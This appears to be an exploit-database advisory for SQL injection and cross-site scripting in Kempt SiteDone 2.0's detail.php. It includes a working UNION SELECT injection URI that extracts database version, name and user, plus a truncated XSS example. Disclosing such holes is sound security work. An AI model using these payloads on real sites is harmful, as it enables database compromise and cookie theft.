Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting and SQL Injection Vulnerabilities

2010-03-18
ID: 55191
CVE: None
Download vulnerable application: None
source: http://www.securityfocus.com/bid/38856/info

Kempt SiteDone is prone to an SQL-injection vulnerability and cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Kempt SiteDone 2.0 is vulnerable; other versions may also be affected. 


The following example URIs are available:

http://www.example.com/site/store/detail.php?articleId=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19--

http://www.example.com/site/store/detail.php?articleId=">
1-4-2 (www02)